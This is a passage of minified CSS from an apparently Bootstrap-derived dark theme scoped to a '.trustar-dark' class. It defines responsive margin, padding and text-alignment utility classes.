.mx-auto{margin-right:auto !important}.trustar-dark .mb-auto,.trustar-dark .my-auto{margin-bottom:auto !important}.trustar-dark .ml-auto,.trustar-dark .mx-auto{margin-left:auto !important}@media (min-width: 576px){.trustar-dark .m-sm-0{margin:0 !important}.trustar-dark .mt-sm-0,.trustar-dark .my-sm-0{margin-top:0 !important}.trustar-dark .mr-sm-0,.trustar-dark .mx-sm-0{margin-right:0 !important}.trustar-dark .mb-sm-0,.trustar-dark .my-sm-0{margin-bottom:0 !important}.trustar-dark .ml-sm-0,.trustar-dark .mx-sm-0{margin-left:0 !important}.trustar-dark .m-sm-1{margin:.25rem !important}.trustar-dark .mt-sm-1,.trustar-dark .my-sm-1{margin-top:.25rem !important}.trustar-dark .mr-sm-1,.trustar-dark .mx-sm-1{margin-right:.25rem !important}.trustar-dark .mb-sm-1,.trustar-dark .my-sm-1{margin-bottom:.25rem !important}.trustar-dark .ml-sm-1,.trustar-dark .mx-sm-1{margin-left:.25rem !important}.trustar-dark .m-sm-2{margin:.5rem !important}.trustar-dark .mt-sm-2,.trustar-dark .my-sm-2{margin-top:.5rem !important}.trustar-dark .mr-sm-2,.trustar-dark .mx-sm-2{margin-right:.5rem !important}.trustar-dark .mb-sm-2,.trustar-dark .my-sm-2{margin-bottom:.5rem !important}.trustar-dark .ml-sm-2,.trustar-dark .mx-sm-2{margin-left:.5rem !important}.trustar-dark .m-sm-3{margin:1rem !important}.trustar-dark .mt-sm-3,.trustar-dark .my-sm-3{margin-top:1rem !important}.trustar-dark .mr-sm-3,.trustar-dark .mx-sm-3{margin-right:1rem !important}.trustar-dark .mb-sm-3,.trustar-dark .my-sm-3{margin-bottom:1rem !important}.trustar-dark .ml-sm-3,.trustar-dark .mx-sm-3{margin-left:1rem !important}.trustar-dark .m-sm-4{margin:1.5rem !important}.trustar-dark .mt-sm-4,.trustar-dark .my-sm-4{margin-top:1.5rem !important}.trustar-dark .mr-sm-4,.trustar-dark .mx-sm-4{margin-right:1.5rem !important}.trustar-dark .mb-sm-4,.trustar-dark .my-sm-4{margin-bottom:1.5rem !important}.trustar-dark .ml-sm-4,.trustar-dark .mx-sm-4{margin-left:1.5rem !important}.trustar-dark .m-sm-5{margin:3rem !important}.trustar-dark .mt-sm-5,.trustar-dark .my-sm-5{margin-top:3rem !important}.trustar-dark .mr-sm-5,.trustar-dark .mx-sm-5{margin-right:3rem !important}.trustar-dark .mb-sm-5,.trustar-dark .my-sm-5{margin-bottom:3rem !important}.trustar-dark .ml-sm-5,.trustar-dark .mx-sm-5{margin-left:3rem !important}.trustar-dark .p-sm-0{padding:0 !important}.trustar-dark .pt-sm-0,.trustar-dark .py-sm-0{padding-top:0 !important}.trustar-dark .pr-sm-0,.trustar-dark .px-sm-0{padding-right:0 !important}.trustar-dark .pb-sm-0,.trustar-dark .py-sm-0{padding-bottom:0 !important}.trustar-dark .pl-sm-0,.trustar-dark .px-sm-0{padding-left:0 !important}.trustar-dark .p-sm-1{padding:.25rem !important}.trustar-dark .pt-sm-1,.trustar-dark .py-sm-1{padding-top:.25rem !important}.trustar-dark .pr-sm-1,.trustar-dark .px-sm-1{padding-right:.25rem !important}.trustar-dark .pb-sm-1,.trustar-dark .py-sm-1{padding-bottom:.25rem !important}.trustar-dark .pl-sm-1,.trustar-dark .px-sm-1{padding-left:.25rem !important}.trustar-dark .p-sm-2{padding:.5rem !important}.trustar-dark .pt-sm-2,.trustar-dark .py-sm-2{padding-top:.5rem !important}.trustar-dark .pr-sm-2,.trustar-dark .px-sm-2{padding-right:.5rem !important}.trustar-dark .pb-sm-2,.trustar-dark .py-sm-2{padding-bottom:.5rem !important}.trustar-dark .pl-sm-2,.trustar-dark .px-sm-2{padding-left:.5rem !important}.trustar-dark .p-sm-3{padding:1rem !important}.trustar-dark .pt-sm-3,.trustar-dark .py-sm-3{padding-top:1rem !important}.trustar-dark .pr-sm-3,.trustar-dark .px-sm-3{padding-right:1rem !important}.trustar-dark .pb-sm-3,.trustar-dark .py-sm-3{padding-bottom:1rem !important}.trustar-dark .pl-sm-3,.trustar-dark .px-sm-3{padding-left:1rem !important}.trustar-dark .p-sm-4{padding:1.5rem !important}.trustar-dark .pt-sm-4,.trustar-dark .py-sm-4{padding-top:1.5rem !important}.trustar-dark .pr-sm-4,.trustar-dark .px-sm-4{padding-right:1.5rem !important}.trustar-dark .pb-sm-4,.trustar-dark .py-sm-4{padding-bottom:1.5rem !important}.trustar-dark .pl-sm-4,.trustar-dark .px-sm-4{padding-left:1.5rem !important}.trustar-dark .p-sm-5{padding:3rem !important}.trustar-dark .pt-sm-5,.trustar-dark .py-sm-5{padding-top:3rem !important}.trustar-dark .pr-sm-5,.trustar-dark .px-sm-5{padding-right:3rem !important}.trustar-dark .pb-sm-5,.trustar-dark .py-sm-5{padding-bottom:3rem !important}.trustar-dark .pl-sm-5,.trustar-dark .px-sm-5{padding-left:3rem !important}.trustar-dark .m-sm-n1{margin:-.25rem !important}.trustar-dark .mt-sm-n1,.trustar-dark .my-sm-n1{margin-top:-.25rem !important}.trustar-dark .mr-sm-n1,.trustar-dark .mx-sm-n1{margin-right:-.25rem !important}.trustar-dark .mb-sm-n1,.trustar-dark .my-sm-n1{margin-bottom:-.25rem !important}.trustar-dark .ml-sm-n1,.trustar-dark .mx-sm-n1{margin-left:-.25rem !important}.trustar-dark .m-sm-n2{margin:-.5rem !important}.trustar-dark .mt-sm-n2,.trustar-dark .my-sm-n2{margin-top:-.5rem !important}.trustar-dark .mr-sm-n2,.trustar-dark .mx-sm-n2{margin-right:-.5rem !important}.trustar-dark .mb-sm-n2,.trustar-dark .my-sm-n2{margin-bottom:-.5rem !important}.trustar-dark .ml-sm-n2,.trustar-dark .mx-sm-n2{margin-left:-.5rem !important}.trustar-dark .m-sm-n3{margin:-1rem !important}.trustar-dark .mt-sm-n3,.trustar-dark .my-sm-n3{margin-top:-1rem !important}.trustar-dark .mr-sm-n3,.trustar-dark .mx-sm-n3{margin-right:-1rem !important}.trustar-dark .mb-sm-n3,.trustar-dark .my-sm-n3{margin-bottom:-1rem !important}.trustar-dark .ml-sm-n3,.trustar-dark .mx-sm-n3{margin-left:-1rem !important}.trustar-dark .m-sm-n4{margin:-1.5rem !important}.trustar-dark .mt-sm-n4,.trustar-dark .my-sm-n4{margin-top:-1.5rem !important}.trustar-dark .mr-sm-n4,.trustar-dark .mx-sm-n4{margin-right:-1.5rem !important}.trustar-dark .mb-sm-n4,.trustar-dark .my-sm-n4{margin-bottom:-1.5rem !important}.trustar-dark .ml-sm-n4,.trustar-dark .mx-sm-n4{margin-left:-1.5rem !important}.trustar-dark .m-sm-n5{margin:-3rem !important}.trustar-dark .mt-sm-n5,.trustar-dark .my-sm-n5{margin-top:-3rem !important}.trustar-dark .mr-sm-n5,.trustar-dark .mx-sm-n5{margin-right:-3rem !important}.trustar-dark .mb-sm-n5,.trustar-dark .my-sm-n5{margin-bottom:-3rem !important}.trustar-dark .ml-sm-n5,.trustar-dark .mx-sm-n5{margin-left:-3rem !important}.trustar-dark .m-sm-auto{margin:auto !important}.trustar-dark .mt-sm-auto,.trustar-dark .my-sm-auto{margin-top:auto !important}.trustar-dark .mr-sm-auto,.trustar-dark .mx-sm-auto{margin-right:auto !important}.trustar-dark .mb-sm-auto,.trustar-dark .my-sm-auto{margin-bottom:auto !important}.trustar-dark .ml-sm-auto,.trustar-dark .mx-sm-auto{margin-left:auto !important}}@media (min-width: 768px){.trustar-dark .m-md-0{margin:0 !important}.trustar-dark .mt-md-0,.trustar-dark .my-md-0{margin-top:0 !important}.trustar-dark .mr-md-0,.trustar-dark .mx-md-0{margin-right:0 !important}.trustar-dark .mb-md-0,.trustar-dark .my-md-0{margin-bottom:0 !important}.trustar-dark .ml-md-0,.trustar-dark .mx-md-0{margin-left:0 !important}.trustar-dark .m-md-1{margin:.25rem !important}.trustar-dark .mt-md-1,.trustar-dark .my-md-1{margin-top:.25rem !important}.trustar-dark .mr-md-1,.trustar-dark .mx-md-1{margin-right:.25rem !important}.trustar-dark .mb-md-1,.trustar-dark .my-md-1{margin-bottom:.25rem !important}.trustar-dark .ml-md-1,.trustar-dark .mx-md-1{margin-left:.25rem !important}.trustar-dark .m-md-2{margin:.5rem !important}.trustar-dark .mt-md-2,.trustar-dark .my-md-2{margin-top:.5rem !important}.trustar-dark .mr-md-2,.trustar-dark .mx-md-2{margin-right:.5rem !important}.trustar-dark .mb-md-2,.trustar-dark .my-md-2{margin-bottom:.5rem !important}.trustar-dark .ml-md-2,.trustar-dark .mx-md-2{margin-left:.5rem !important}.trustar-dark .m-md-3{margin:1rem !important}.trustar-dark .mt-md-3,.trustar-dark .my-md-3{margin-top:1rem !important}.trustar-dark .mr-md-3,.trustar-dark .mx-md-3{margin-right:1rem !important}.trustar-dark .mb-md-3,.trustar-dark .my-md-3{margin-bottom:1rem !important}.trustar-dark .ml-md-3,.trustar-dark .mx-md-3{margin-left:1rem !important}.trustar-dark .m-md-4{margin:1.5rem !important}.trustar-dark .mt-md-4,.trustar-dark .my-md-4{margin-top:1.5rem !important}.trustar-dark .mr-md-4,.trustar-dark .mx-md-4{margin-right:1.5rem !important}.trustar-dark .mb-md-4,.trustar-dark .my-md-4{margin-bottom:1.5rem !important}.trustar-dark .ml-md-4,.trustar-dark .mx-md-4{margin-left:1.5rem !important}.trustar-dark .m-md-5{margin:3rem !important}.trustar-dark .mt-md-5,.trustar-dark .my-md-5{margin-top:3rem !important}.trustar-dark .mr-md-5,.trustar-dark .mx-md-5{margin-right:3rem !important}.trustar-dark .mb-md-5,.trustar-dark .my-md-5{margin-bottom:3rem !important}.trustar-dark .ml-md-5,.trustar-dark .mx-md-5{margin-left:3rem !important}.trustar-dark .p-md-0{padding:0 !important}.trustar-dark .pt-md-0,.trustar-dark .py-md-0{padding-top:0 !important}.trustar-dark .pr-md-0,.trustar-dark .px-md-0{padding-right:0 !important}.trustar-dark .pb-md-0,.trustar-dark .py-md-0{padding-bottom:0 !important}.trustar-dark .pl-md-0,.trustar-dark .px-md-0{padding-left:0 !important}.trustar-dark .p-md-1{padding:.25rem !important}.trustar-dark .pt-md-1,.trustar-dark .py-md-1{padding-top:.25rem !important}.trustar-dark .pr-md-1,.trustar-dark .px-md-1{padding-right:.25rem !important}.trustar-dark .pb-md-1,.trustar-dark .py-md-1{padding-bottom:.25rem !important}.trustar-dark .pl-md-1,.trustar-dark .px-md-1{padding-left:.25rem !important}.trustar-dark .p-md-2{padding:.5rem !important}.trustar-dark .pt-md-2,.trustar-dark .py-md-2{padding-top:.5rem !important}.trustar-dark .pr-md-2,.trustar-dark .px-md-2{padding-right:.5rem !important}.trustar-dark .pb-md-2,.trustar-dark .py-md-2{padding-bottom:.5rem !important}.trustar-dark .pl-md-2,.trustar-dark .px-md-2{padding-left:.5rem !important}.trustar-dark .p-md-3{padding:1rem !important}.trustar-dark .pt-md-3,.trustar-dark .py-md-3{padding-top:1rem !important}.trustar-dark .pr-md-3,.trustar-dark .px-md-3{padding-right:1rem !important}.trustar-dark .pb-md-3,.trustar-dark .py-md-3{padding-bottom:1rem !important}.trustar-dark .pl-md-3,.trustar-dark .px-md-3{padding-left:1rem !important}.trustar-dark .p-md-4{padding:1.5rem !important}.trustar-dark .pt-md-4,.trustar-dark .py-md-4{padding-top:1.5rem !important}.trustar-dark .pr-md-4,.trustar-dark .px-md-4{padding-right:1.5rem !important}.trustar-dark .pb-md-4,.trustar-dark .py-md-4{padding-bottom:1.5rem !important}.trustar-dark .pl-md-4,.trustar-dark .px-md-4{padding-left:1.5rem !important}.trustar-dark .p-md-5{padding:3rem !important}.trustar-dark .pt-md-5,.trustar-dark .py-md-5{padding-top:3rem !important}.trustar-dark .pr-md-5,.trustar-dark .px-md-5{padding-right:3rem !important}.trustar-dark .pb-md-5,.trustar-dark .py-md-5{padding-bottom:3rem !important}.trustar-dark .pl-md-5,.trustar-dark .px-md-5{padding-left:3rem !important}.trustar-dark .m-md-n1{margin:-.25rem !important}.trustar-dark .mt-md-n1,.trustar-dark .my-md-n1{margin-top:-.25rem !important}.trustar-dark .mr-md-n1,.trustar-dark .mx-md-n1{margin-right:-.25rem !important}.trustar-dark .mb-md-n1,.trustar-dark .my-md-n1{margin-bottom:-.25rem !important}.trustar-dark .ml-md-n1,.trustar-dark .mx-md-n1{margin-left:-.25rem !important}.trustar-dark .m-md-n2{margin:-.5rem !important}.trustar-dark .mt-md-n2,.trustar-dark .my-md-n2{margin-top:-.5rem !important}.trustar-dark .mr-md-n2,.trustar-dark .mx-md-n2{margin-right:-.5rem !important}.trustar-dark .mb-md-n2,.trustar-dark .my-md-n2{margin-bottom:-.5rem !important}.trustar-dark .ml-md-n2,.trustar-dark .mx-md-n2{margin-left:-.5rem !important}.trustar-dark .m-md-n3{margin:-1rem !important}.trustar-dark .mt-md-n3,.trustar-dark .my-md-n3{margin-top:-1rem !important}.trustar-dark .mr-md-n3,.trustar-dark .mx-md-n3{margin-right:-1rem !important}.trustar-dark .mb-md-n3,.trustar-dark .my-md-n3{margin-bottom:-1rem !important}.trustar-dark .ml-md-n3,.trustar-dark .mx-md-n3{margin-left:-1rem !important}.trustar-dark .m-md-n4{margin:-1.5rem !important}.trustar-dark .mt-md-n4,.trustar-dark .my-md-n4{margin-top:-1.5rem !important}.trustar-dark .mr-md-n4,.trustar-dark .mx-md-n4{margin-right:-1.5rem !important}.trustar-dark .mb-md-n4,.trustar-dark .my-md-n4{margin-bottom:-1.5rem !important}.trustar-dark .ml-md-n4,.trustar-dark .mx-md-n4{margin-left:-1.5rem !important}.trustar-dark .m-md-n5{margin:-3rem !important}.trustar-dark .mt-md-n5,.trustar-dark .my-md-n5{margin-top:-3rem !important}.trustar-dark .mr-md-n5,.trustar-dark .mx-md-n5{margin-right:-3rem !important}.trustar-dark .mb-md-n5,.trustar-dark .my-md-n5{margin-bottom:-3rem !important}.trustar-dark .ml-md-n5,.trustar-dark .mx-md-n5{margin-left:-3rem !important}.trustar-dark .m-md-auto{margin:auto !important}.trustar-dark .mt-md-auto,.trustar-dark .my-md-auto{margin-top:auto !important}.trustar-dark .mr-md-auto,.trustar-dark .mx-md-auto{margin-right:auto !important}.trustar-dark .mb-md-auto,.trustar-dark .my-md-auto{margin-bottom:auto !important}.trustar-dark .ml-md-auto,.trustar-dark .mx-md-auto{margin-left:auto !important}}@media (min-width: 992px){.trustar-dark .m-lg-0{margin:0 !important}.trustar-dark .mt-lg-0,.trustar-dark .my-lg-0{margin-top:0 !important}.trustar-dark .mr-lg-0,.trustar-dark .mx-lg-0{margin-right:0 !important}.trustar-dark .mb-lg-0,.trustar-dark .my-lg-0{margin-bottom:0 !important}.trustar-dark .ml-lg-0,.trustar-dark .mx-lg-0{margin-left:0 !important}.trustar-dark .m-lg-1{margin:.25rem !important}.trustar-dark .mt-lg-1,.trustar-dark .my-lg-1{margin-top:.25rem !important}.trustar-dark .mr-lg-1,.trustar-dark .mx-lg-1{margin-right:.25rem !important}.trustar-dark .mb-lg-1,.trustar-dark .my-lg-1{margin-bottom:.25rem !important}.trustar-dark .ml-lg-1,.trustar-dark .mx-lg-1{margin-left:.25rem !important}.trustar-dark .m-lg-2{margin:.5rem !important}.trustar-dark .mt-lg-2,.trustar-dark .my-lg-2{margin-top:.5rem !important}.trustar-dark .mr-lg-2,.trustar-dark .mx-lg-2{margin-right:.5rem !important}.trustar-dark .mb-lg-2,.trustar-dark .my-lg-2{margin-bottom:.5rem !important}.trustar-dark .ml-lg-2,.trustar-dark .mx-lg-2{margin-left:.5rem !important}.trustar-dark .m-lg-3{margin:1rem !important}.trustar-dark .mt-lg-3,.trustar-dark .my-lg-3{margin-top:1rem !important}.trustar-dark .mr-lg-3,.trustar-dark .mx-lg-3{margin-right:1rem !important}.trustar-dark .mb-lg-3,.trustar-dark .my-lg-3{margin-bottom:1rem !important}.trustar-dark .ml-lg-3,.trustar-dark .mx-lg-3{margin-left:1rem !important}.trustar-dark .m-lg-4{margin:1.5rem !important}.trustar-dark .mt-lg-4,.trustar-dark .my-lg-4{margin-top:1.5rem !important}.trustar-dark .mr-lg-4,.trustar-dark .mx-lg-4{margin-right:1.5rem !important}.trustar-dark .mb-lg-4,.trustar-dark .my-lg-4{margin-bottom:1.5rem !important}.trustar-dark .ml-lg-4,.trustar-dark .mx-lg-4{margin-left:1.5rem !important}.trustar-dark .m-lg-5{margin:3rem !important}.trustar-dark .mt-lg-5,.trustar-dark .my-lg-5{margin-top:3rem !important}.trustar-dark .mr-lg-5,.trustar-dark .mx-lg-5{margin-right:3rem !important}.trustar-dark .mb-lg-5,.trustar-dark .my-lg-5{margin-bottom:3rem !important}.trustar-dark .ml-lg-5,.trustar-dark .mx-lg-5{margin-left:3rem !important}.trustar-dark .p-lg-0{padding:0 !important}.trustar-dark .pt-lg-0,.trustar-dark .py-lg-0{padding-top:0 !important}.trustar-dark .pr-lg-0,.trustar-dark .px-lg-0{padding-right:0 !important}.trustar-dark .pb-lg-0,.trustar-dark .py-lg-0{padding-bottom:0 !important}.trustar-dark .pl-lg-0,.trustar-dark .px-lg-0{padding-left:0 !important}.trustar-dark .p-lg-1{padding:.25rem !important}.trustar-dark .pt-lg-1,.trustar-dark .py-lg-1{padding-top:.25rem !important}.trustar-dark .pr-lg-1,.trustar-dark .px-lg-1{padding-right:.25rem !important}.trustar-dark .pb-lg-1,.trustar-dark .py-lg-1{padding-bottom:.25rem !important}.trustar-dark .pl-lg-1,.trustar-dark .px-lg-1{padding-left:.25rem !important}.trustar-dark .p-lg-2{padding:.5rem !important}.trustar-dark .pt-lg-2,.trustar-dark .py-lg-2{padding-top:.5rem !important}.trustar-dark .pr-lg-2,.trustar-dark .px-lg-2{padding-right:.5rem !important}.trustar-dark .pb-lg-2,.trustar-dark .py-lg-2{padding-bottom:.5rem !important}.trustar-dark .pl-lg-2,.trustar-dark .px-lg-2{padding-left:.5rem !important}.trustar-dark .p-lg-3{padding:1rem !important}.trustar-dark .pt-lg-3,.trustar-dark .py-lg-3{padding-top:1rem !important}.trustar-dark .pr-lg-3,.trustar-dark .px-lg-3{padding-right:1rem !important}.trustar-dark .pb-lg-3,.trustar-dark .py-lg-3{padding-bottom:1rem !important}.trustar-dark .pl-lg-3,.trustar-dark .px-lg-3{padding-left:1rem !important}.trustar-dark .p-lg-4{padding:1.5rem !important}.trustar-dark .pt-lg-4,.trustar-dark .py-lg-4{padding-top:1.5rem !important}.trustar-dark .pr-lg-4,.trustar-dark .px-lg-4{padding-right:1.5rem !important}.trustar-dark .pb-lg-4,.trustar-dark .py-lg-4{padding-bottom:1.5rem !important}.trustar-dark .pl-lg-4,.trustar-dark .px-lg-4{padding-left:1.5rem !important}.trustar-dark .p-lg-5{padding:3rem !important}.trustar-dark .pt-lg-5,.trustar-dark .py-lg-5{padding-top:3rem !important}.trustar-dark .pr-lg-5,.trustar-dark .px-lg-5{padding-right:3rem !important}.trustar-dark .pb-lg-5,.trustar-dark .py-lg-5{padding-bottom:3rem !important}.trustar-dark .pl-lg-5,.trustar-dark .px-lg-5{padding-left:3rem !important}.trustar-dark .m-lg-n1{margin:-.25rem !important}.trustar-dark .mt-lg-n1,.trustar-dark .my-lg-n1{margin-top:-.25rem !important}.trustar-dark .mr-lg-n1,.trustar-dark .mx-lg-n1{margin-right:-.25rem !important}.trustar-dark .mb-lg-n1,.trustar-dark .my-lg-n1{margin-bottom:-.25rem !important}.trustar-dark .ml-lg-n1,.trustar-dark .mx-lg-n1{margin-left:-.25rem !important}.trustar-dark .m-lg-n2{margin:-.5rem !important}.trustar-dark .mt-lg-n2,.trustar-dark .my-lg-n2{margin-top:-.5rem !important}.trustar-dark .mr-lg-n2,.trustar-dark .mx-lg-n2{margin-right:-.5rem !important}.trustar-dark .mb-lg-n2,.trustar-dark .my-lg-n2{margin-bottom:-.5rem !important}.trustar-dark .ml-lg-n2,.trustar-dark .mx-lg-n2{margin-left:-.5rem !important}.trustar-dark .m-lg-n3{margin:-1rem !important}.trustar-dark .mt-lg-n3,.trustar-dark .my-lg-n3{margin-top:-1rem !important}.trustar-dark .mr-lg-n3,.trustar-dark .mx-lg-n3{margin-right:-1rem !important}.trustar-dark .mb-lg-n3,.trustar-dark .my-lg-n3{margin-bottom:-1rem !important}.trustar-dark .ml-lg-n3,.trustar-dark .mx-lg-n3{margin-left:-1rem !important}.trustar-dark .m-lg-n4{margin:-1.5rem !important}.trustar-dark .mt-lg-n4,.trustar-dark .my-lg-n4{margin-top:-1.5rem !important}.trustar-dark .mr-lg-n4,.trustar-dark .mx-lg-n4{margin-right:-1.5rem !important}.trustar-dark .mb-lg-n4,.trustar-dark .my-lg-n4{margin-bottom:-1.5rem !important}.trustar-dark .ml-lg-n4,.trustar-dark .mx-lg-n4{margin-left:-1.5rem !important}.trustar-dark .m-lg-n5{margin:-3rem !important}.trustar-dark .mt-lg-n5,.trustar-dark .my-lg-n5{margin-top:-3rem !important}.trustar-dark .mr-lg-n5,.trustar-dark .mx-lg-n5{margin-right:-3rem !important}.trustar-dark .mb-lg-n5,.trustar-dark .my-lg-n5{margin-bottom:-3rem !important}.trustar-dark .ml-lg-n5,.trustar-dark .mx-lg-n5{margin-left:-3rem !important}.trustar-dark .m-lg-auto{margin:auto !important}.trustar-dark .mt-lg-auto,.trustar-dark .my-lg-auto{margin-top:auto !important}.trustar-dark .mr-lg-auto,.trustar-dark .mx-lg-auto{margin-right:auto !important}.trustar-dark .mb-lg-auto,.trustar-dark .my-lg-auto{margin-bottom:auto !important}.trustar-dark .ml-lg-auto,.trustar-dark .mx-lg-auto{margin-left:auto !important}}@media (min-width: 1200px){.trustar-dark .m-xl-0{margin:0 !important}.trustar-dark .mt-xl-0,.trustar-dark .my-xl-0{margin-top:0 !important}.trustar-dark .mr-xl-0,.trustar-dark .mx-xl-0{margin-right:0 !important}.trustar-dark .mb-xl-0,.trustar-dark .my-xl-0{margin-bottom:0 !important}.trustar-dark .ml-xl-0,.trustar-dark .mx-xl-0{margin-left:0 !important}.trustar-dark .m-xl-1{margin:.25rem !important}.trustar-dark .mt-xl-1,.trustar-dark .my-xl-1{margin-top:.25rem !important}.trustar-dark .mr-xl-1,.trustar-dark .mx-xl-1{margin-right:.25rem !important}.trustar-dark .mb-xl-1,.trustar-dark .my-xl-1{margin-bottom:.25rem !important}.trustar-dark .ml-xl-1,.trustar-dark .mx-xl-1{margin-left:.25rem !important}.trustar-dark .m-xl-2{margin:.5rem !important}.trustar-dark .mt-xl-2,.trustar-dark .my-xl-2{margin-top:.5rem !important}.trustar-dark .mr-xl-2,.trustar-dark .mx-xl-2{margin-right:.5rem !important}.trustar-dark .mb-xl-2,.trustar-dark .my-xl-2{margin-bottom:.5rem !important}.trustar-dark .ml-xl-2,.trustar-dark .mx-xl-2{margin-left:.5rem !important}.trustar-dark .m-xl-3{margin:1rem !important}.trustar-dark .mt-xl-3,.trustar-dark .my-xl-3{margin-top:1rem !important}.trustar-dark .mr-xl-3,.trustar-dark .mx-xl-3{margin-right:1rem !important}.trustar-dark .mb-xl-3,.trustar-dark .my-xl-3{margin-bottom:1rem !important}.trustar-dark .ml-xl-3,.trustar-dark .mx-xl-3{margin-left:1rem !important}.trustar-dark .m-xl-4{margin:1.5rem !important}.trustar-dark .mt-xl-4,.trustar-dark .my-xl-4{margin-top:1.5rem !important}.trustar-dark .mr-xl-4,.trustar-dark .mx-xl-4{margin-right:1.5rem !important}.trustar-dark .mb-xl-4,.trustar-dark .my-xl-4{margin-bottom:1.5rem !important}.trustar-dark .ml-xl-4,.trustar-dark .mx-xl-4{margin-left:1.5rem !important}.trustar-dark .m-xl-5{margin:3rem !important}.trustar-dark .mt-xl-5,.trustar-dark .my-xl-5{margin-top:3rem !important}.trustar-dark .mr-xl-5,.trustar-dark .mx-xl-5{margin-right:3rem !important}.trustar-dark .mb-xl-5,.trustar-dark .my-xl-5{margin-bottom:3rem !important}.trustar-dark .ml-xl-5,.trustar-dark .mx-xl-5{margin-left:3rem !important}.trustar-dark .p-xl-0{padding:0 !important}.trustar-dark .pt-xl-0,.trustar-dark .py-xl-0{padding-top:0 !important}.trustar-dark .pr-xl-0,.trustar-dark .px-xl-0{padding-right:0 !important}.trustar-dark .pb-xl-0,.trustar-dark .py-xl-0{padding-bottom:0 !important}.trustar-dark .pl-xl-0,.trustar-dark .px-xl-0{padding-left:0 !important}.trustar-dark .p-xl-1{padding:.25rem !important}.trustar-dark .pt-xl-1,.trustar-dark .py-xl-1{padding-top:.25rem !important}.trustar-dark .pr-xl-1,.trustar-dark .px-xl-1{padding-right:.25rem !important}.trustar-dark .pb-xl-1,.trustar-dark .py-xl-1{padding-bottom:.25rem !important}.trustar-dark .pl-xl-1,.trustar-dark .px-xl-1{padding-left:.25rem !important}.trustar-dark .p-xl-2{padding:.5rem !important}.trustar-dark .pt-xl-2,.trustar-dark .py-xl-2{padding-top:.5rem !important}.trustar-dark .pr-xl-2,.trustar-dark .px-xl-2{padding-right:.5rem !important}.trustar-dark .pb-xl-2,.trustar-dark .py-xl-2{padding-bottom:.5rem !important}.trustar-dark .pl-xl-2,.trustar-dark .px-xl-2{padding-left:.5rem !important}.trustar-dark .p-xl-3{padding:1rem !important}.trustar-dark .pt-xl-3,.trustar-dark .py-xl-3{padding-top:1rem !important}.trustar-dark .pr-xl-3,.trustar-dark .px-xl-3{padding-right:1rem !important}.trustar-dark .pb-xl-3,.trustar-dark .py-xl-3{padding-bottom:1rem !important}.trustar-dark .pl-xl-3,.trustar-dark .px-xl-3{padding-left:1rem !important}.trustar-dark .p-xl-4{padding:1.5rem !important}.trustar-dark .pt-xl-4,.trustar-dark .py-xl-4{padding-top:1.5rem !important}.trustar-dark .pr-xl-4,.trustar-dark .px-xl-4{padding-right:1.5rem !important}.trustar-dark .pb-xl-4,.trustar-dark .py-xl-4{padding-bottom:1.5rem !important}.trustar-dark .pl-xl-4,.trustar-dark .px-xl-4{padding-left:1.5rem !important}.trustar-dark .p-xl-5{padding:3rem !important}.trustar-dark .pt-xl-5,.trustar-dark .py-xl-5{padding-top:3rem !important}.trustar-dark .pr-xl-5,.trustar-dark .px-xl-5{padding-right:3rem !important}.trustar-dark .pb-xl-5,.trustar-dark .py-xl-5{padding-bottom:3rem !important}.trustar-dark .pl-xl-5,.trustar-dark .px-xl-5{padding-left:3rem !important}.trustar-dark .m-xl-n1{margin:-.25rem !important}.trustar-dark .mt-xl-n1,.trustar-dark .my-xl-n1{margin-top:-.25rem !important}.trustar-dark .mr-xl-n1,.trustar-dark .mx-xl-n1{margin-right:-.25rem !important}.trustar-dark .mb-xl-n1,.trustar-dark .my-xl-n1{margin-bottom:-.25rem !important}.trustar-dark .ml-xl-n1,.trustar-dark .mx-xl-n1{margin-left:-.25rem !important}.trustar-dark .m-xl-n2{margin:-.5rem !important}.trustar-dark .mt-xl-n2,.trustar-dark .my-xl-n2{margin-top:-.5rem !important}.trustar-dark .mr-xl-n2,.trustar-dark .mx-xl-n2{margin-right:-.5rem !important}.trustar-dark .mb-xl-n2,.trustar-dark .my-xl-n2{margin-bottom:-.5rem !important}.trustar-dark .ml-xl-n2,.trustar-dark .mx-xl-n2{margin-left:-.5rem !important}.trustar-dark .m-xl-n3{margin:-1rem !important}.trustar-dark .mt-xl-n3,.trustar-dark .my-xl-n3{margin-top:-1rem !important}.trustar-dark .mr-xl-n3,.trustar-dark .mx-xl-n3{margin-right:-1rem !important}.trustar-dark .mb-xl-n3,.trustar-dark .my-xl-n3{margin-bottom:-1rem !important}.trustar-dark .ml-xl-n3,.trustar-dark .mx-xl-n3{margin-left:-1rem !important}.trustar-dark .m-xl-n4{margin:-1.5rem !important}.trustar-dark .mt-xl-n4,.trustar-dark .my-xl-n4{margin-top:-1.5rem !important}.trustar-dark .mr-xl-n4,.trustar-dark .mx-xl-n4{margin-right:-1.5rem !important}.trustar-dark .mb-xl-n4,.trustar-dark .my-xl-n4{margin-bottom:-1.5rem !important}.trustar-dark .ml-xl-n4,.trustar-dark .mx-xl-n4{margin-left:-1.5rem !important}.trustar-dark .m-xl-n5{margin:-3rem !important}.trustar-dark .mt-xl-n5,.trustar-dark .my-xl-n5{margin-top:-3rem !important}.trustar-dark .mr-xl-n5,.trustar-dark .mx-xl-n5{margin-right:-3rem !important}.trustar-dark .mb-xl-n5,.trustar-dark .my-xl-n5{margin-bottom:-3rem !important}.trustar-dark .ml-xl-n5,.trustar-dark .mx-xl-n5{margin-left:-3rem !important}.trustar-dark .m-xl-auto{margin:auto !important}.trustar-dark .mt-xl-auto,.trustar-dark .my-xl-auto{margin-top:auto !important}.trustar-dark .mr-xl-auto,.trustar-dark .mx-xl-auto{margin-right:auto !important}.trustar-dark .mb-xl-auto,.trustar-dark .my-xl-auto{margin-bottom:auto !important}.trustar-dark .ml-xl-auto,.trustar-dark .mx-xl-auto{margin-left:auto !important}}.trustar-dark .text-monospace{font-family:SFMono-Regular,Menlo,Monaco,Consolas,\"Liberation Mono\",\"Courier New\",monospace}.trustar-dark .text-justify{text-align:justify !important}.trustar-dark .text-wrap{white-space:normal !important}.trustar-dark .text-nowrap{white-space:nowrap !important}.trustar-dark .text-truncate{overflow:hidden;text-overflow:ellipsis;white-space:nowrap}.trustar-dark .text-left{text-align:left !important}.trustar-dark .text-right{text-align:right !important}.trustar-dark .text-center{text-align:center !important}@media (min-width: 576px){.trustar-dark .text-sm-left{text-align:left !important}.trustar-dark .text-sm-right{text-align:right !important}.trustar-dark .text-sm-center{text-align:center !important}}@media (min-width: 768px){.trustar-dark .text-md-left{text-align:left !important}.trustar-dark .text-md-right{text-align:right !important}.trustar-dark .text-md-center{text-align:center !important}}@media (min-width: 992px){.trustar-dark .text-lg-left{text-align:left !important}.trustar-dark .text-lg-right{text-align:right 